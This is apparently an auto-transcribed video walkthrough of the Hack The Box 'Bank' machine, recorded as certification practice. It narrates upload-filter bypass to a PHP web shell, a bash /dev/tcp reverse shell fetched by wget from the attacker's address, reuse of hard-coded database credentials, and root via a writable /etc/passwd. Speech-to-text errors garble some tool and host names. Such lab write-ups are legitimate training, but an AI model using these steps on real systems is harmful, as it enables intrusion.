What up? What up? Hello, everyone. Back again with box number 3 on my CWES prep journey. And this time we're leveling up the setup. Finally, I got my camera working. So you can actually see me struggle in real time now. If you've been following along, you already know the deal. I'm working through hack the box machines related to the web penetration path and documenting the whole process as I learn. Okay, so uh, enough talking, let's jump in. So from the list that I've showed on the first video, it's we did Arctic, we did Armageddon, and I skipped Backdoor because I didn't like the box that much, even though I did it. I didn't like the box that much. You don't get to learn something, in my opinion, or you don't get to learn as much as you learn from Bank. So today we're doing Bank. I already started the machine from Hack the Box, and I already created my folders, and we are ready to rock. So let's start with a quick scan on the machine to scan all the ports. And as you can see, we get DNS, SSH, and a web server, port 80. So let's see what we have there. It's a default page of the Apache. So let's start fuzzing this to find any hidden directories or files. Before we do a more thorough scan, let's use go to fuzz, do fuzz view this fuzz, user share word list. Let's do dirtbuster directory list medium. And do I need anything else? Yeah, let's put some color on it, remove the comments, and output it to a directory. Let's call it root derp medium, I guess, and go. Okay, let that finish. Let's call this directory fuzz. Let's give it some color as well, and let's go back to here. Let's do, so we found port 22, 80, and 53, which is DNS. We can go ahead and scan those ports, throw some nmap scripts on them. 2253, here we go, and -a for all scripts. So run. Nothing yet. This is weird, nothing yet. I remember doing this box in the beginning, but I don't remember how I did it, to be honest. So it's gonna be fun doing it again, I guess. Okay. So we got open domain. This is DNS. You can see here we got Apache 2.4.7. Maybe we can try enumerating DNS and see if we can make, any zone transfer or stuff like that. AXFR, this transfer failed. We can try like this. Nope. Maybe any records available for us. Nothing here. Okay. Let's check if SSH is allows us to enter a password or is with key. It seems that we can use a password, so it's open for us. It's password based. We don't get anything from directory list. We could try for files next. Also, let's try to guess if you're in index.html. Nothing here. Robots.txt. Nope. Don't think there's anything here that could help us. Maybe we got some hidden hints. Does it seem that this is the case? Okay, so I guess we wait. That's normal. We could also try adding the host name, as the machine is called bank, sorry. We can go ahead and add this to our hosts files. Maybe you get lucky. So we could do bank.htb. Save that. Let's try this. Bank.htb. Nope. I think I did this wrong, right? Yeah, it's my bad. It's like this, right? I mean, sorry, like this. That should work if there's anything there. Yep. Okay. So it seems that it's using PHP. You can see that from the extension here. And we can see that from the webalizer, of course. Admin. Of course not. Is there any hidden? jQuery. Nothing here. Okay, can start fuzzing this. Okay, let's stop this and do fuzz again, but this time do root to bank root. Bank.htb. Nice. So we got uploads, assets, ink. Let's try visiting those. So this is uploads, forbidden. Okay. What was the other one? Assets and ink. Assets. Nice. Even though this is accessible, I can't see anything that juicy. Can see CSS, fondos on phone images, image, thumbs DB. That's a database or not? Is it? Let's see. Let's go into files and check this out. So copy, downloads, thumbs DB here. What is that? Document file, document cannot read section info. Just do strings on it. Don't think it's a database. Let's try opening it. Open What is that? The fuck? Okay, let's keep it there and see if we get anything out of it after. Inc. Okay, so here are all the ticket user. Ticket, header and footer. User, username, test. No. Okay. Ink is interesting. Got stuff there. Till let's open burp and see burp. See how the authentication is happening. I assume, or the login functionality. I could better say exit. So let's do bring that on the side. Burp proxy admin. Let's see. Let's try for SQL injection. Let's put a code and see if we get any error back. Stick at 200. Okay. Credentials are not matching our records. Let's copy this and put it here. Let's try adding a quote at the password field. Send. Still get the same. About here. I don't think there is anything in the login. And I assume if we try user.php, not found. Ticket.php was not found on the server. Let's see. Not found. In nothing yet. Okay, till it finishes, we can open cherry tree and see our methodology. Methodology. Stupid red. Use icon. Let's use this, I guess. Okay. So fuzzing files, directories. Let me make this bigger. Okay. Fuzzing directories for files. Plus extensions, we could say. Also, we can do vhosts. Let's save this to hack the box. Bang here. Notes. Let's put what we find so far. So directories. Those. Move this. Perfect. Okay. balance transfer. Ooh, what is that? .acc. There's passwords here. Bank report, encrypt success. Okay, is this base 64? Base 64 pickle. No, I don't think. Let me see something. If we take this and put that here and say something like interesting, even though I don't know what kind of encryption is that. We could go ahead and test for files. Let's do extensions -e. We know it's php .txt and .bb, maybe. Could try that. Support.php, nice. Let's see what support is PHP, but before we go ahead and check what that is, we could what I want to see is that is there anything else that is the same with this hash? Maybe there is a password repeated. This is what I'm thinking right now. So if I go like this, no. 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 Let's see, let's take a random one. Like this. Okay. Interesting. Let's check support now. Support.php. Support.php. Bang.htb. Oh. Wait, we got redirected. We put support here, but we got redirected to .php. Okay. Let me see, can we burp? Let's intercept that and see, maybe we can manipulate this. So it says it's going to support PHP. Let's, what is it? Do intercept, respond to this request, forward 302 not found, but this is a different page. We still get the, even though we're getting redirected, we still get the page. So what we could do is just do 200, okay. And then forward, here we are, nice. Title, message, attachment, actions. Tell us your problem, choose a file. Okay, so we've got an upload functionality here. Let's say test, and let's create a web shell. Scanning, let's see, let's do nano shell.php. Let's do php system $get dot that's fine. Choose a file, bang, open, submit. Let's put that in the repeater and see how this behaves. Oh, we got redirected again. But we did, I think it successfully uploaded our file, and from our notes, I think in ink we got tickets, something. Was it? Let's see if we can reach the file we just uploaded, shell.php.id. No. Let's disable this and let's try. Where's the response? You can't upload this. You can't upload this file. You can upload only images. So it doesn't allow us to upload files, it seems. Scripts. What if we say that this is an image and it's, oh no, JPEG. Send it again. It still knows that this is a script. If I do .jpeg here, send, let's see, success. So it's checking the file extension if it's an image or not. Let's see. Maybe it's checking only the first extension. We could do jpeg.php like this. Maybe we bypass this. You can upload. Only upload images. Can I upload a GIF? I can. Well, and maybe we can reach that through the uploads directory that we did found, right? So let's try that. So uploads shell.gif. Okay, we can say dot equals ID. cannot display because it contains errors. Let's try the different one. The one that we uploaded before was, I think, php.jpg .id. Cannot display contains errors. So we can upload files, but we have to find a way to upload. We have to find a way to upload a PHP shell, web shell. We found anything else? Okay, so let's enumerate the upload functionality. So let's say here. We managed to intercept the request towards support.php, which result in 302 redirect, but we have changed that to 200k, and now we got upload functionality to work with. Let's put that as node, and let's do upload functionality testing. Okay, so when we're testing, at least when I'm testing upload functionality, I test for a few things. First, which what we have to understand here, or at least what I'm trying to understand here, is where is the check? I'm sure with doing a few tests right now, we saw that according to the file extension, it determines if the file we're trying to upload is a picture, an image or not, which that's one thing. However, there is times that you can bypass this by putting a double extension, and we can try see if we can upload the PHP shell but change the MIME type, and see if we can get past that as well. So fuzz file extensions, fuzz content type, and fuzz or check MIME type. Let's first start with this fuzz file extension and see what we can upload. Let's see, our fuzzing is still going. Yeah, okay. Let's check this then. So in order to do this, what we can do, it's we can send that to intruder by Control I, then highlight this, add, and we're gonna use checklist to do this. There is web extensions, I think, web extensions big, open. So as you can see here, we got ASP, which we don't need, that's executing on IIS. What we want, it's this right here. There is occasions where PHP 2, 3, 4, 5, 6, 7, or 8 is getting executed, or PHTML. But yeah, we can try do that and see what we get back, what extensions are allowed. Also, I'm not sure if there is, let me see, there is a possibility that, Okay, let's start this and remove encoding. Start this. Yeah, let that run. What we also can check in is if the file is being checked on the client side. So we have to go ahead, send that to burp. Have to go to set this on. So let's send that to burp. Print intercept. Yes. Okay. 100, 200. Okay. Forward this. Here's where we can actually test. But what I want to see is go to inspect and check if maybe it's in the client side where the check happens. We can disable some checks here. So let me how do okay, thank you. Let me see. There we go. It says here I added the file extension .htb to execute as PHP for debugging purposes. So this means if we upload a .htb file, it will be executed as PHP, so we can get a shell. However, I just want to check another thing. So here it says that name file upload, yes, on change, upload info.html, this C fake path. Don't know why it's saying C, because we know we're against the Linux machine. Okay. So let's see what intruder found, and then let's say we didn't found out about that comment, the hidden comment, which is always a good practice to view page source. Okay, I've stuck into a lot of machines because I didn't do that, and I was slapping my head after I was watching the walkthrough because it was in front of my eyes. So if we filter by length, we can see, and according to the response we get, we can see what kind of files are allowed to be uploaded. And let's see. So we have to find one that it's been up. So let's do swal. Let's take this, put it here, and auto scroll. Success. Okay, so 72 seems that is the one that are being successful. Success. So we can upload a GIF. We cannot upload a PHP 7. We can upload a JPEG, a PNG. What if we do by length? Just a minute. The reason that why we cannot filter by length is because at the very top, whenever we successfully upload a file, I think is getting populated here. So the length is getting bigger, and that's why. So in other cases, you'll have to go one by one and check according to the message that you get which ones are allowed. So GIF is allowed, as we said before, JPEG is allowed, JPG is allowed, PNG is allowed. I just want to see if we could upload a file without finding out about the hidden comment. And it seems that we cannot upload anything else. Okay. So thank you very much, intruder. We don't need you anymore. Let's go ahead and upload .htb. Send that. Successfully uploaded. So if we now go to uploads shell.htb and we do this, let's get that. Whoa, what happened? I spelled that wrong. Okay, there we go. So we have a web shell. Great, job done. Let's get a reverse shell now. So let's do shell.sh bash -i things like this, dev TCP RIP 1571. Let's do, we already know that port 8 is open, so why not? No, let's do, I don't know, 53, no, 9091. Is it definitely? No. How is it? Let's see. Let's go to revshows.com. So it's dev TCP and this. I always forgot this. Okay. And actually try executing that directly from the web shell, but if it doesn't work, we can go ahead and upload this on the target machine and get the web shell that way. So let's go here. Nope. Too many bad characters maybe. Let's do curl. Nope. What if we try bin bash? No again. Okay. Let's upload this. Let's first check which plus let's see if wget exists on the box. It does. So we can go ahead and use wget http 10.10.15.71 shell.sh plus o, and let's save that to temp shell.sh. Let's spin up our web server. Perfect, it uploaded the shell. So now we can go ahead and execute this. We can do bash plus this. So then see that. We got a shell and we are data. Okay, let's upgrade our shell. And I remember, I always forget that stable shell. Do we have Python 3? Yep, we do. So I can copy this, put it here. Okay, then we Control Z, that here, and then export term equals xterm, and now we can have a better shell. So the reason why we cannot see that, let me see. So delete uploads, bank reports. Check this out. Lol. Okay. Okay. So we got an email and a password as Christos Christopoulos. He's Greek for sure. So let's save this and let's update our nodes. So let's see, when I used to intercept, yes, upload functionality testing, fast. Let's say let's do this by checking, by inspecting the support.php by inspecting the support.php web page using functionality using DevTools. We found out that files ending with .htb get to the exec are being executed as PHP scripts. Getting a reverse shell and looking around, we found shots directory, and we can copy and paste this. Perfect. Nope. Control Shift F. No. What was it? Control Shift Alt F. Yes, that's it. Okay. So we could try switching to Chris. Is there a user called Chris on the box? Let's see. Password D, grab sh. Yes, there is. Is here Chris. Paste the password. Authentication failed. Did we? Yeah, that's the correct password. maybe we can SSH as Chris. SSH Chris at bang.htb. So we checked for files, we checked for directories. Let's check for maybe there's other vhosts, HTTP, user share, checklists, discovery, DNS. I'd like to use this one. I see to remove comments, see to have color, and let's say DNS or vhost txt. Let's say bitquark one. What? Oh, where do I fuzz, right? So let's fuzz the host fuzz.bang.htb. Let that go. And we want to filter out the fs this size. Perfect. So did we manage to log in? Let's try that again. Oh, I have a spelling error. I've typed Christ rather than Chris. Let's try that again. Come on. It seems that this password is not for the user. Maybe we can log in as Chris here rather than. Let's test this out. Let's see. So we got Chris at bang.htb. Let's paste the password here. Let's copy the password again. Chris at bang.htb. Submit. Yeah, okay. So we can connect here. Also, no. So we cannot log in as Chris. Let's try once more here. Maybe we typed the password wrong. Chris. Paste. Nope. Okay. Let's see, maybe we find anything interesting here. So these are the transactions. Okay. Support. We did that already. Should I be fuzzing this as an authenticated user? I guess we don't have a. Yeah, this is my authentication session cookie. Maybe we have to fuzz this. But before making any assumptions, let's check maybe we'll find anything else in here. We can go into ink and test ticket.php. There we go. So we do have another password, and this is for the database. Go ahead. Hard-coded credentials were found in tickets.php. Put that here. Let's do this like this. Check the user. The credentials are everywhere. User PHP, we see the same credentials. Maybe we could try these credentials and switch to Chris. No. Maybe switch to root. No. Let's try. Let's see what else do we have. Maybe there's more. Header.php. I don't think. Did we check login.php? Let's check footer. Nothing here. Let's check login.php. So user session.php, input password. So we got a new set of credentials, and it says that is logging into MySQL. So we can go ahead and try this, right? Let's copy this. MySQL -u root. Just like this. MySQL-u root p, and we put the password, and we can access the database. /h for help. How do I see the databases? Show databases. Found error. Oh, show databases. Show DBs. Show DB. What? Edits and exit display. How do I list the databases? I thought it was show DB. Show DB. No. do know the database. I think it's this one, right? Yeah. So let's attempt to use one. So we can say use this. Okay, database changed. Show tables. Okay. Credit cards, ticket, users. Select everything from users. Yeah, we already got his password though. Show everything from tickets and from tickets. Oh, it's select the this is the tickets. What about credit cards? Select everything from credit cards. Nothing interesting here. Did we try logging in as Chris at m.htb and then use the new password we found? Maybe that's the case. Copy. Let's see. Nothing here. Let's try top 1 million. Fast.bound.htb. Top 1 mil. So this to keep the same. So fs 11 51 0. Let's check. Let's see. Let's go back. Wanna check because we are Apache. Maybe we can find something in Apache here. Apache 2conf. Let's remove the comments. Grep v. This. User agent. Let's go to sites enabled and do bang. So we have bang. Server admin is Chris. There must be a way to get into Chris somehow. Besides available. No. Let's do bank. Bank. Same thing here. What about this? Cut default. Remove the comments. What is that? Let's go back to home. Let's go to Chris. Yeah, so user.txt is in Chris. So it must be a way to get it into Chris somehow. I don't know. We have to continue fuzzing here till we find something, I guess. Okay, I guess we could run limpies, right? Is there anything in out? No. Okay. Okay, let's get Wimpy's up. Let's do Shift-D, sudo locate Wimpy's. There we go. I do have Wimpy's already. What? Because I did before. I've deleted it, so let's get Wimpy's sudo locate Wimpy's. Let's get that from here. Got it. Bash limpies. Nothing here. Okay. Let's try. Did we take any mistake? Try this. What do you mean connection closed? This is an old box. Let's see. Is there anything here that we missed? Usage. And what? Support. Test. Choose a file. Let's upload the second share just for the lols. Set this, submit, change this to HTTP. But I don't think we're gonna get success. Yeah, we're gonna get same thing as before because I can't type today. Dot, yeah, we still dot data. Let's see. Okay, we can see log files. Yeah, okay, that's something. What? There's a readable function by me. Do I have write privilege on etc password D? The fuck? Yeah, it seems that way. Okay, so I guess we don't have to get to Chris. Also, pkexecs enabled. But whatever, we can edit. That was disappointing. Okay, so let's edit. Let's say password D, or we can go ahead. Let's do vi. Let me. Let's see. I think I can just echo inside it, or just go ahead and edit it. etc. Do I have vi? Which by, of course I do. By password D. And let's see. Do I have a payload? Where is it? Local exploits, no. Linux privilege escalation. Where is it? Payloads. There it is. Yeah, there it is. I have something like this, and this is the all my notes. I'm gonna be sharing a few of them after I finish this prep thing, but what we can do, we can go ahead and do this right here. So we can echo or just vi, take this, copy this, and add it here. For example, save the file. What? WQ exclamation. Can't write vim info file home to the vim info. Let's see. Is it there? Yeah, it's there. So now we can go ahead and do su root 2 wood, and we are root. What happens here is you can do OpenSSL password D and then take the output and add it here. And then you can switch to root. If you let me show you how it's done. So I'm now on my local box. If I do OpenSSL password D wood, I'm gonna get this. Then you can copy this into this format right here, and we can get root that easy. So let's see, let's go to root, and there is the root flag. But now that we finished the box, I'm wondering, was it any way to get to Chris other than that? Right, what was it? I think I can go from the hack the box. Yeah. Let's see. Is this the way? Yeah, this is what we found. Privilege escalation. Running Linux reveals a non-standard suit binary. Emergency. Running the file immediately grants root privileges. What? Okay, so there's multiple ways to get to root. Does this exist? Let me check. There it is. Lol. Okay. Okay, so this is the box, the third box. Thank you so much for watching. I hope you guys enjoyed it, and I'll see you on the next one. Bye.